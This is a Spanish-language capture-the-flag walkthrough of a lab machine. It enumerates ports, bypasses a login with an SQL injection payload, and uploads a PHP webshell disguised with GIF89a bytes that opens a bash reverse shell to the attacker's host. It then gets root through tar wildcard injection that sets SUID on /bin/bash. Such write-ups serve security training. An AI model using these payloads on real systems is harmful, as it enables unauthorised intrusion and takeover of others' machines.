Enumeramos puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.9
❯ nmap -sCV -p 22,80 -oN 02-targeted.txt 192.168.1.9
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-19 23:50 -04
Nmap scan report for 192.168.1.9
Host is up (0.00031s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Quick Automative - Home
| http-robots.txt: 1 disallowed entry
|_/admin/
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTras registrar una cuenta en /customer obtenemos un listado de correos. En /employee hay un login vulnerable a SQL Injection de bypass:
user: admin@admin.com
passwd: admin' or 1=1-- -Dentro, en Users/Employees/Upload photo, subimos una webshell PHP interceptando con Burp y anteponiendo los magic bytes GIF89a para sortear la validación:
❯ cat pwned.php
<?php
shell_exec("bash -c 'bash -i >& /dev/tcp/192.168.1.5/1234 0>&1'");
?>Cambiamos la foto del usuario y, al cargarse, obtenemos la shell:
❯ ncat -nlvp 1234
Ncat: Connection from 192.168.1.9:53910.
bash: cannot set terminal process group (740): Inappropriate ioctl for device
bash: no job control in this shell
www-data@quick4:/var/www/html/employee/uploads$Obtenemos la primera flag. Revisamos las tareas cron:
www-data@quick4:/tmp$ cat /etc/crontab
...
*/1 * * * * root /usr/local/bin/backup.sh
...
www-data@quick4:/tmp$ cat /usr/local/bin/backup.sh
#!/bin/bash
cd /var/www/html/
tar czf /var/backups/backup-website.tar.gz *El tar * es explotable con Tar Wildcard Injection:
www-data@quick4:/var/www/html$ echo "chmod u+s /bin/bash" > repwned.sh
www-data@quick4:/var/www/html$ chmod +x repwned.sh
www-data@quick4:/var/www/html$ touch /var/www/html/--checkpoint=1
www-data@quick4:/var/www/html$ touch /var/www/html/--checkpoint-action=exec=sh\ repwned.sh
www-data@quick4:/var/www/html$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1396520 Mar 14 11:31 /bin/bash
www-data@quick4:/var/www/html$ bash -p
bash-5.1# whoami
rootObtenemos nuestra flag.
Fin.